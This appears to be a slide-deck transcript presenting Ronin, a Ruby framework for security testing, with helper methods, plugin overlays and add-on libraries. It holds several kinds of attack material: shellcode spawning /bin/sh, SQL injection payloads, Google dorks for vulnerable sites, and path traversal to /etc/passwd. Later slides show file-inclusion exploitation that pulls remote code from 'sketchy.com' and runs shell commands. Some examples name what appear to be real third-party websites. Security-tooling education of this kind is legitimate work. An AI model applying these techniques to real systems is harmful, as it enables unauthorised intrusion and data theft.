Ronin: A Platform for Publishing and Mayhem

I'm here to talk about Ronin, a Platform for Publishing and Mayhem. To start off, what exactly is Ronin.

Ruby (not Rails)

Ruby programming language logo

It's written in Ruby, not Rails.

A Hacking Environment

$ ronin
>> puts "insert hax here"

It's a Hacking Environment built ontop of Ruby

A Platform for Publishing

Scissor-lift platform

It's also a Platform for Publishing, also built ontop of Ruby.

Free

Empty Box labeled "Free Stuff"

It's free.

Put all of that together...

Samurai with Bear-Head

You get something like this...

The Hacking Environment

(RUBY << Convenience::Methods) + Database

Convenience Methods

Do more in one-line:

"damn right".md5
# => "b93cb1fa1844e0e594b171fc8c05f807"

Binary data

0x1337.bytes(4)
# => [55, 19, 0, 0]
0x1337.pack(Arch.i686)
# => "7\x13\0\0"

0x1337.pack(Arch.arm_le,2)
# => "7\x13"
"7\x13\0\0".depack(Arch.i686)
# => 4919

Generating Text

Chars.ascii.random_char
# => "\n"
Chars.alpha_numeric.random_chars(5)
# => ["y", "3", "G", "w", "h"]
Chars.hexadecimal.random_string(10..15)
# => "3067BBdFCce"

Hexdumps

File.hexdump 'path/to/data'
hexdump some_data
File.unhexdump('path/to/hexdump.txt')

Base64

payload = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00\
\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xb8\x01\x00\
\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xffxff\x2f\x62\x69\x6e\x2f\
\x73\x68\x00\x89\xec\x5d\xc3"

payload.base64_encode
# => "6ypeiXYIxkYHAMdGDAAAAAoAuAsAAACJ841OCI1WDM2AuAEAAAC7AAAAAM2A\n6NH///8vYmluL3NoAInsXcM=\n"
"c2VjcmV0\n".base64_decode
# => "secret"

Digests

"leet school".md5
# => "1b11ba66f5e9d40a7eef699cd812e362"
"lol train".sha1
# => "37f05f0cc2914615c580af396df5c66316112f48"
"admin".sha256
# => "8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918"
"this is so contrived".sha512
# => "8520cdc51bf485d17aef7c088bee0ce9e475fa098fb6e1b5df24abaa2ef95c0b3f1dc7d1beb8c5f723db8a18e74ccd24f07ed5fa083bbab4de266dd014a6a8ca"

Paths

Path.up(7)
# => #<Ronin::Path:../../../../../../..>

Path.up(5) / 'etc' / 'passwd'
# => #<Ronin::Path:../../../../../etc/passwd>

IPs

IPAddr.each('10.1.1.1/24') do |ip|
  ...
end
IPAddr.each('10.1.*.1-5') do |ip|
  ...
end
IPAddr.each('::ff::02-0a::c3') do |ip6|
  ...
end

URLs

url = URI('http://example.com/index.php?q=hello&page=Main')
# => #<URI::HTTP:0x7f8be66a21a0 URL:http://example.com/index.php?q=hello&page=Main>

url.query_params
# => {"q"=>"hello", "page"=>"Main"}

url.query_params['q'] = "hello AND 1=0"
# => "hello AND 1=0"

puts url
http://example.com/index.php?q=hello+AND+1%3D0&page=Main
=> nil

... And there's still more

ronin.rubyforge.org/docs/ronin

The Database

DataMapper + sqlite3:

The Database uses DataMapper, a Ruby ORM, and the sqlite3 database by default.

ORM

Object Relational Mapper:

require 'ronin/model'

class Person

  include Ronin::Model

  property :id, Serial
  property :name, String
  property :age, Integer

end

ORM stands for Object Relational Mapper, meaning that we can define our models as Classes, and rows in the database become Objects.

No SQL Needed

Person.create(:name => 'bla', :age => 22)
Person.first(:name => 'bla')
Person.all(:age.in => (18..30))

A major benefit of using an ORM, is that there is no SQL needed. Create and query records all from the comfort of Ruby.

The Platform

Manages Overlays and their contents:

  • install
  • update
  • uninstall

The Platform allows for the installation, the updating and removal of Overlays and their contents.

Overlay

A directory (with some structure) that can contain:

  • Extensions (Small pieces of Code)
  • Cacheable Objects (Exploits, Payloads, etc)
  • Static Files (Erb Templates, XML, YAML, etc)
  • Supporting Code

What's an Overlay, you ask? It's simply a directory that may contain, extensions, cacheable objects, static files and other supporting code.

Host anywhere

Can be hosted with:

  • SubVersion (SVN)
  • Mercurial (Hg)
  • Git
  • Rsync

Overlays can also be hosted anywhere using SubVersion, Mercurial, Git or even Rsync.

Install an Overlay

$ ronin install git://example.com/repo.git
$ ronin install --svn http://example.com/repo/trunk/

Update them

$ ronin update

Self Publishing

Release what you want, when you want to.

Public/Semi-Public/Private.

Step 1: Generate an Overlay

$ sudo gem install ronin-gen
$ ronin-gen overlay path/to/overlay
  ./lib/
  ./lib/init.rb
  ./objects/
  ./tasks/
  ./Rakefile
  ./ronin.xml
$ cd path/to/overlay
$ ronin-gen extension my_ext
  ./lib/
  ./lib/my_ext.rb
  ./lib/my_ext/
  ./extension.rb
... hack hack hack ...

Generate an Overlay using the ronin-gen command. As you can see a lib/ directory was created for misc Code, an objects/ directory for the Cacheable Objects and a ronin.xml file that describes the Overlay.

You can also generate extensions with the ronin-gen command.

Step 2: Host it Somewhere

Host it somewhere. Maybe host it on your own private server, again Overlays do not have to be public.

Step 3: ????

Grimace shows up at a Star Wars convention

Question-mark.

Step 4: Profit

Mini-casino inside of a cubicle

Profit. It's that easy.

Where's the Mayhem?

Ownage is Imminent

Additional Libraries

Ronin Dorks

Supports various Google ™ Dorks:

$ sudo gem install ronin-dorks
$ ronin-dorks
>>

The Ronin Dorks library provides support for various Google ™ Dorks. Google Dorking is the act of performing Search queries that yield you vulnerable web-sites or sensitive information. Ronin Dorks uses the GScraper library.

Ronin Dorks Examples

Web::Dorks.inurl('stmt').first_page.urls
Web::Dorks.index_of_cgi_bin.first_page.urls
Web::Dorks.php_my_admin.page(2).urls
Web::Dorks.sharepoint(:inurl => 'edu').first_page.urls

Ronin Exploits

Provides exploitation and payload crafting functionality:

$ sudo gem install ronin-exploits

Ronin Exploits allow exploit developers to write exploits and payloads in Ruby.

Ronin Exploit Example

require 'ronin/exploits'

ronin_tcp_exploit do
  cache do
    self.name = 'trivial example'
    self.version = '0.2'
    self.license = License.cc_by_nc
    self.default_port = 1337
  end

  def build
    @buffer = 'some data'
  end

  def deploy
    tcp_connect_and_send @buffer
  end
end

Using Ronin Exploits it becomes easy to define Exploits in Ruby, without having to write excess code.

Ronin Payload Example

require 'ronin/payalods'

ronin_shellcode do
end

Ronin SQL

Provides support for various SQL related tasks:

$ sudo gem install --no-rdoc ronin-sql
$ ronin-sql
>>

Ronin SQL provides support for various SQL related security tasks. The library currently supports scanning for SQL Injections and the crafting custom SQL Injection payloads.

Ronin SQL Examples

url = URI('http://redteatrosalternativos.com/_05enlaces/links/phpHoo3.php?viewCat=1')

url.has_sqli?
# => true

sqli = url.first_sqli
# => #<Ronin::SQL::Injection: ...>

Ronin PHP

Provides support for various PHP security tasks:

$ sudo gem install ronin-php
$ ronin-php
>>

Ronin PHP provides support for various PHP related security task. The library currently supports Local File Inclusion (LFI) and Remote File Inclusion (RFI) detection, scanning and exploitation.

Ronin PHP also comes with a custom RFI payload which uses PHP Remote Procedure Call (RPC) to execute arbitrary code or commands through the RFI. This payload also sports a cool Web 2.0 AJAX interface.

Ronin PHP: LFI Example

url = URI('http://www.e-builds.com/?page=Portfolio')

lfi = url.first_lfi
# => #<Ronin::PHP::LFI: ...>

lfi.get('/etc/passwd')
# => "..."

lfi.include('/etc/passwd')
# => #<Ronin::PHP::LFI::File:/etc/passwd>

lfi.include_target('lighttpd.conf')
# => #<Ronin::PHP::LFI::File:/etc/lighttpd/lighttpd.conf>

Ronin PHP: RFI Example

url = URI('http://www.example.com/page.php?layout=default')

rfi = url.first_rfi
# => #<Ronin::PHP::RFI: ...>

Ronin PHP: RPC over RFI

client = rfi.rpc

client.include('http://www.sketchy.com/my_functions.php')
# => true

client.fingerprint
# => {...}

client.call('shell.exec','whoami')
# => "www"

Ronin PHP: RPC Console Service

php = client.console
php.phpversion
# => "4.3.10"

php.php_uname('-m')
# => "i686"

Ronin PHP: RPC Shell Service

sh = client.shell
sh.cwd
# => "/var/www/site/\n"

sh.cd  '..'
# => ""

sh.exec('date -u')
# => "Thu Aug 21 10:29:38 UTC 2008\n"

sh.system('ps')
   PID TTY          TIME CMD
 27042 pts/8    00:00:00 bash
 27841 pts/8    00:00:00 ps
# => nil

Ronin Scanners

Provides Ruby interfaces to various third-party security scanners: 

$ sudo gem install ronin-scanners
$ ronin-scanners
>>

Ronin Scanners provides Ruby interfaces to various third-party security scanners. It currently supports Nmap and all of it's command-line options. It also supports Nikto, the HTTP Server scanner.

Ronin Scanners Example

require 'ronin/scanners/nmap'

Scanners::Nmap.scan(
  :targets => 'www.google.com',
  :ports => [80, 21, 25],
  :service_scan => true
)
# => nil
Scanners::Nmap.import_scan(
  :targets => 'www.google.com',
  :ports => [80, 21, 25],
  :service_scan => true
)
# => [...]

Typing Ruby, while your already in Ruby, is easier than remembering Nmap's command-line options.

Ronin Web

Provides web-scraping and spidering functionality for Ronin:

$ sudo gem install ronin-web
$ ronin-web
>>

Ronin Web Example

page = Web.get('http://reddit.com/')
puts page.search('a.title/@href')
agent = Web::Spider.host('example.com') do |s|
  s.every_url { |url| ... }
  s.every_page { |page| ... }
end

Interested?

$ sudo gem install ronin

IRC: irc.freenode.net #ronin

API Docs: ronin.rubyforge.org/docs/

Code:

Show Slides Back Next Show Slide Notes